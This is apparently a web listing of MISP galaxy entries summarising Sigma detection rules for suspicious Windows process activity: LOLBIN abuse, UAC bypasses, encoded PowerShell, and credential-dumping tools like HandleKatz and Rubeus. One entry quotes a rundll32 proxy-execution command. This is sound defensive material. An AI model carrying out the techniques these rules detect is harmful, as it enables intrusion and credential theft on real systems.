Detects WMI script event consumers

Internal MISP references

UUID ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e which can be used as unique global reference for WMI Persistence - Script Event Consumer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2018/03/07
falsepositive ['Legitimate event consumers', 'Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button']
filename proc_creation_win_wmi_persistence_script_event_consumer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.003']
Related clusters

To see the related clusters, click here.

Execute Code with Pester.bat

Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)

Internal MISP references

UUID 59e938ff-0d6d-4dc3-b13f-36cc28734d4e which can be used as unique global reference for Execute Code with Pester.bat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020/10/08
falsepositive ['Legitimate use of Pester for writing tests for Powershell scripts and modules']
filename proc_creation_win_lolbin_pester_1.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Potential Mftrace.EXE Abuse

Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.

Internal MISP references

UUID 3d48c9d3-1aa6-418d-98d3-8fd3c01a564e which can be used as unique global reference for Potential Mftrace.EXE Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/09
falsepositive ['Legitimate use for tracing purposes']
filename proc_creation_win_mftrace_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Potential Command Line Path Traversal Evasion Attempt

Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline

Internal MISP references

UUID 1327381e-6ab0-4f38-b583-4c1b8346a56b which can be used as unique global reference for Potential Command Line Path Traversal Evasion Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/10/26
falsepositive ['Google Drive', 'Citrix']
filename proc_creation_win_susp_commandline_path_traversal_evasion.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Regsvr32 Execution From Highly Suspicious Location

Detects execution of regsvr32 where the DLL is located in a highly suspicious locations

Internal MISP references

UUID 327ff235-94eb-4f06-b9de-aaee571324be which can be used as unique global reference for Regsvr32 Execution From Highly Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/26
falsepositive ['Unlikely']
filename proc_creation_win_regsvr32_susp_exec_path_2.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Chromium Browser Instance Executed With Custom Extension

Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension

Internal MISP references

UUID 88d6e60c-759d-4ac1-a447-c0f1466c2d21 which can be used as unique global reference for Chromium Browser Instance Executed With Custom Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aedan Russell, frack113, X__Junior (Nextron Systems)
creation_date 2022/06/19
falsepositive ['Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert']
filename proc_creation_win_browsers_chromium_load_extension.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1176']
Related clusters

To see the related clusters, click here.

Browser Execution In Headless Mode

Detects execution of Chromium based browser in headless mode

Internal MISP references

UUID ef9dcfed-690c-4c5d-a9d1-482cd422225c which can be used as unique global reference for Browser Execution In Headless Mode in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/12
falsepositive ['Unknown']
filename proc_creation_win_browsers_chromium_headless_exec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Child Process Of WinRAR.EXE

Detects potentially suspicious child processes of WinRAR.exe.

Internal MISP references

UUID 146aace8-9bd6-42ba-be7a-0070d8027b76 which can be used as unique global reference for Potentially Suspicious Child Process Of WinRAR.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/31
falsepositive ['Unknown']
filename proc_creation_win_winrar_susp_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1203']
Related clusters

To see the related clusters, click here.

Taskmgr as LOCAL_SYSTEM

Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM

Internal MISP references

UUID 9fff585c-c33e-4a86-b3cd-39312079a65f which can be used as unique global reference for Taskmgr as LOCAL_SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/03/18
falsepositive ['Unknown']
filename proc_creation_win_taskmgr_localsystem.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Suspicious Execution Of PDQDeployRunner

Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines

Internal MISP references

UUID 12b8e9f5-96b2-41e1-9a42-8c6779a5c184 which can be used as unique global reference for Suspicious Execution Of PDQDeployRunner in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/22
falsepositive ['Legitimate use of the PDQDeploy tool to execute these commands']
filename proc_creation_win_pdqdeploy_runner_susp_children.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

ETW Logging Tamper In .NET Processes

Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.

Internal MISP references

UUID 41421f44-58f9-455d-838a-c398859841d4 which can be used as unique global reference for ETW Logging Tamper In .NET Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Unlikely']
filename proc_creation_win_susp_etw_modification_cmdline.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Security Tools Keyword Lookup Via Findstr.EXE

Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. This detection focuses on the keywords that the attacker might use as a filter.

Internal MISP references

UUID 4fe074b4-b833-4081-8f24-7dcfeca72b42 which can be used as unique global reference for Security Tools Keyword Lookup Via Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2023/10/20
falsepositive ['Unknown']
filename proc_creation_win_findstr_security_keyword_lookup.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1518.001']
Related clusters

To see the related clusters, click here.

Suspicious Sigverif Execution

Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution

Internal MISP references

UUID 7d4aaec2-08ed-4430-8b96-28420e030e04 which can be used as unique global reference for Suspicious Sigverif Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Unknown']
filename proc_creation_win_lolbin_sigverif.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Suspicious Schtasks Schedule Types

Detects scheduled task creations or modification on a suspicious schedule type

Internal MISP references

UUID 24c8392b-aa3c-46b7-a545-43f71657fe98 which can be used as unique global reference for Suspicious Schtasks Schedule Types in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/09
falsepositive ['Legitimate processes that run at logon. Filter according to your environment']
filename proc_creation_win_schtasks_schedule_type.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

ConvertTo-SecureString Cmdlet Usage Via CommandLine

Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity

Internal MISP references

UUID 74403157-20f5-415d-89a7-c505779585cf which can be used as unique global reference for ConvertTo-SecureString Cmdlet Usage Via CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
creation_date 2020/10/11
falsepositive ['Legitimate use to pass password to different powershell commands']
filename proc_creation_win_powershell_cmdline_convertto_securestring.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Sysinternals PsSuspend Execution

Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes

Internal MISP references

UUID 48bbc537-b652-4b4e-bd1d-281172df448f which can be used as unique global reference for Sysinternals PsSuspend Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/23
falsepositive ['Unknown']
filename proc_creation_win_sysinternals_pssuspend_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.persistence', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Uncommon Child Process Of AddinUtil.EXE

Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.

Internal MISP references

UUID b5746143-59d6-4603-8d06-acbd60e166ee which can be used as unique global reference for Uncommon Child Process Of AddinUtil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
creation_date 2023/09/18
falsepositive ['Unknown']
filename proc_creation_win_addinutil_uncommon_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Diantz Download and Compress Into a CAB File

Download and compress a remote file and store it in a cab file on local machine.

Internal MISP references

UUID 185d7418-f250-42d0-b72e-0c8b70661e93 which can be used as unique global reference for Suspicious Diantz Download and Compress Into a CAB File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/26
falsepositive ['Unknown']
filename proc_creation_win_lolbin_diantz_remote_cab.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Use NTFS Short Name in Command Line

Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection

Internal MISP references

UUID dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795 which can be used as unique global reference for Use NTFS Short Name in Command Line in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/05
falsepositive ['Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.']
filename proc_creation_win_susp_ntfs_short_name_use_cli.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

HackTool - HandleKatz LSASS Dumper Execution

Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same

Internal MISP references

UUID ca621ba5-54ab-4035-9942-d378e6fcde3c which can be used as unique global reference for HackTool - HandleKatz LSASS Dumper Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/18
falsepositive ['Unknown']
filename proc_creation_win_hktl_handlekatz.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Suspicious Encoded PowerShell Command Line

Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)

Internal MISP references

UUID ca2092a1-c273-4878-9b4b-0d60115bf5ea which can be used as unique global reference for Suspicious Encoded PowerShell Command Line in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
creation_date 2018/09/03
falsepositive No established falsepositives
filename proc_creation_win_powershell_base64_encoded_cmd.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Remote Access Tool - ScreenConnect Remote Command Execution

Detects the execution of a system command via the ScreenConnect RMM service.

Internal MISP references

UUID b1f73849-6329-4069-bc8f-78a604bb8b23 which can be used as unique global reference for Remote Access Tool - ScreenConnect Remote Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ali Alwashali
creation_date 2023/10/10
falsepositive ['Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used.']
filename proc_creation_win_remote_access_tools_screenconnect_remote_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

PUA - Fast Reverse Proxy (FRP) Execution

Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.

Internal MISP references

UUID 32410e29-5f94-4568-b6a3-d91a8adad863 which can be used as unique global reference for PUA - Fast Reverse Proxy (FRP) Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth
creation_date 2022/09/02
falsepositive ['Legitimate use']
filename proc_creation_win_pua_frp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

Use Of The SFTP.EXE Binary As A LOLBIN

Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag

Internal MISP references

UUID a85ffc3a-e8fd-4040-93bf-78aff284d801 which can be used as unique global reference for Use Of The SFTP.EXE Binary As A LOLBIN in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/10
falsepositive ['Unknown']
filename proc_creation_win_lolbin_sftp.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

UAC Bypass Using IDiagnostic Profile

Detects the "IDiagnosticProfileUAC" UAC bypass technique

Internal MISP references

UUID 4cbef972-f347-4170-b62a-8253f6168e6d which can be used as unique global reference for UAC Bypass Using IDiagnostic Profile in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/03
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_idiagnostic_profile.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

HackTool - RedMimicry Winnti Playbook Execution

Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility

Internal MISP references

UUID 95022b85-ff2a-49fa-939a-d7b8f56eeb9b which can be used as unique global reference for HackTool - RedMimicry Winnti Playbook Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexander Rausch
creation_date 2020/06/24
falsepositive ['Unknown']
filename proc_creation_win_hktl_redmimicry_winnti_playbook.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1106', 'attack.t1059.003', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Allow Service Access Using Security Descriptor Tampering Via Sc.EXE

Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.

Internal MISP references

UUID 6c8fbee5-dee8-49bc-851d-c3142d02aa47 which can be used as unique global reference for Allow Service Access Using Security Descriptor Tampering Via Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/28
falsepositive ['Unknown']
filename proc_creation_win_sc_sdset_allow_service_changes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Indirect Command Execution From Script File Via Bash.EXE

Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.

Internal MISP references

UUID 2d22a514-e024-4428-9dba-41505bd63a5b which can be used as unique global reference for Indirect Command Execution From Script File Via Bash.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/15
falsepositive ['Unknown']
filename proc_creation_win_bash_file_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Wscript Shell Run In CommandLine

Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity

Internal MISP references

UUID 2c28c248-7f50-417a-9186-a85b223010ee which can be used as unique global reference for Wscript Shell Run In CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/31
falsepositive ['Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly']
filename proc_creation_win_mshta_inline_vbscript.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Conhost.exe CommandLine Path Traversal

detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking

Internal MISP references

UUID ee5e119b-1f75-4b34-add8-3be976961e39 which can be used as unique global reference for Conhost.exe CommandLine Path Traversal in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/14
falsepositive ['Unlikely']
filename proc_creation_win_conhost_path_traversal.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

PowerShell Base64 Encoded Invoke Keyword

Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls

Internal MISP references

UUID 6385697e-9f1b-40bd-8817-f4a91f40508e which can be used as unique global reference for PowerShell Base64 Encoded Invoke Keyword in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t
creation_date 2022/05/20
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_invoke.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Renamed AutoHotkey.EXE Execution

Detects execution of a renamed autohotkey.exe binary based on PE metadata fields

Internal MISP references

UUID 0f16d9cf-0616-45c8-8fad-becc11b5a41c which can be used as unique global reference for Renamed AutoHotkey.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali
creation_date 2023/02/07
falsepositive ['Unknown']
filename proc_creation_win_renamed_autohotkey.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Detection of PowerShell Execution via Sqlps.exe

This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.

Internal MISP references

UUID 0152550d-3a26-4efd-9f0e-54a0b28ae2f3 which can be used as unique global reference for Detection of PowerShell Execution via Sqlps.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Agro (@agro_sev) oscd.community
creation_date 2020/10/10
falsepositive ['Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action.']
filename proc_creation_win_mssql_sqlps_susp_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Suspicious Execution From Outlook Temporary Folder

Detects a suspicious program execution in Outlook temp folder

Internal MISP references

UUID a018fdc3-46a3-44e5-9afb-2cd4af1d4b39 which can be used as unique global reference for Suspicious Execution From Outlook Temporary Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/01
falsepositive ['Unknown']
filename proc_creation_win_office_outlook_execution_from_temp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Stop Windows Service Via Net.EXE

Detects the stopping of a Windows service via the "net" utility.

Internal MISP references

UUID 88872991-7445-4a22-90b2-a3adadb0e827 which can be used as unique global reference for Stop Windows Service Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/05
falsepositive ["There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly"]
filename proc_creation_win_net_stop_service.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

Renamed Jusched.EXE Execution

Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group

Internal MISP references

UUID edd8a48c-1b9f-4ba1-83aa-490338cd1ccb which can be used as unique global reference for Renamed Jusched.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Swisscom
creation_date 2019/06/04
falsepositive ['Unknown']
filename proc_creation_win_renamed_jusched.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

PUA - AdvancedRun Execution

Detects the execution of AdvancedRun utility

Internal MISP references

UUID d2b749ee-4225-417e-b20e-a8d2193cbb84 which can be used as unique global reference for PUA - AdvancedRun Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/20
falsepositive ['Unknown']
filename proc_creation_win_pua_advancedrun.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1564.003', 'attack.t1134.002', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

Uninstall Sysinternals Sysmon

Detects the removal of Sysmon, which could be a potential attempt at defense evasion

Internal MISP references

UUID 6a5f68d1-c4b5-46b9-94ee-5324892ea939 which can be used as unique global reference for Uninstall Sysinternals Sysmon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/12
falsepositive ['Legitimate administrators might use this command to remove Sysmon for debugging purposes']
filename proc_creation_win_sysinternals_sysmon_uninstall.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

UAC Bypass Using Windows Media Player - Process

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

Internal MISP references

UUID 0058b9e5-bcd7-40d4-9205-95ca5a16d7b2 which can be used as unique global reference for UAC Bypass Using Windows Media Player - Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_wmp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

HackTool - Rubeus Execution

Detects the execution of the hacktool Rubeus via PE information of command line parameters

Internal MISP references

UUID 7ec2c172-dceb-4c10-92c9-87c1881b7e18 which can be used as unique global reference for HackTool - Rubeus Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/12/19
falsepositive ['Unlikely']
filename proc_creation_win_hktl_rubeus.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003', 'attack.t1558.003', 'attack.lateral_movement', 'attack.t1550.003']
Related clusters

To see the related clusters, click here.

Gzip Archive Decode Via PowerShell

Detects attempts of decoding encoded Gzip archives via PowerShell.

Internal MISP references

UUID 98767d61-b2e8-4d71-b661-e36783ee24c1 which can be used as unique global reference for Gzip Archive Decode Via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Hieu Tran
creation_date 2023/03/13
falsepositive ['Legitimate administrative scripts may use this functionality. Use "ParentImage" in combination with the script names and allowed users and applications to filter legitimate executions']
filename proc_creation_win_powershell_decode_gzip.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1132.001']
Related clusters

To see the related clusters, click here.

Group Membership Reconnaissance Via Whoami.EXE

Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.

Internal MISP references

UUID bd8b828d-0dca-48e1-8a63-8a58ecf2644f which can be used as unique global reference for Group Membership Reconnaissance Via Whoami.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/28
falsepositive ['Unknown']
filename proc_creation_win_whoami_groups_discovery.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

Suspicious Csi.exe Usage

Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'

Internal MISP references

UUID 40b95d31-1afc-469e-8d34-9a3a667d058e which can be used as unique global reference for Suspicious Csi.exe Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Konstantin Grishchenko, oscd.community
creation_date 2020/10/17
falsepositive ['Legitimate usage by software developers']
filename proc_creation_win_csi_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1072', 'attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Git Clone

Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious

Internal MISP references

UUID aef9d1f1-7396-4e92-a927-4567c7a495c1 which can be used as unique global reference for Suspicious Git Clone in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/03
falsepositive ['Unknown']
filename proc_creation_win_git_susp_clone.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.reconnaissance', 'attack.t1593.003']
Related clusters

To see the related clusters, click here.

HackTool - SharpImpersonation Execution

Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively

Internal MISP references

UUID f89b08d0-77ad-4728-817b-9b16c5a69c7a which can be used as unique global reference for HackTool - SharpImpersonation Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/27
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharp_impersonation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1134.001', 'attack.t1134.003']
Related clusters

To see the related clusters, click here.

Rundll32 InstallScreenSaver Execution

An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver

Internal MISP references

UUID 15bd98ea-55f4-4d37-b09a-e7caa0fa2221 which can be used as unique global reference for Rundll32 InstallScreenSaver Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec
creation_date 2022/04/28
falsepositive ['Legitimate installation of a new screensaver']
filename proc_creation_win_rundll32_installscreensaver.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1218.011', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Service StartupType Change Via Sc.EXE

Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"

Internal MISP references

UUID 85c312b7-f44d-4a51-a024-d671c40b49fc which can be used as unique global reference for Service StartupType Change Via Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/01
falsepositive ['False positives may occur with troubleshooting scripts']
filename proc_creation_win_sc_disable_service.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Hotfix Updates Reconnaissance Via Wmic.EXE

Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts

Internal MISP references

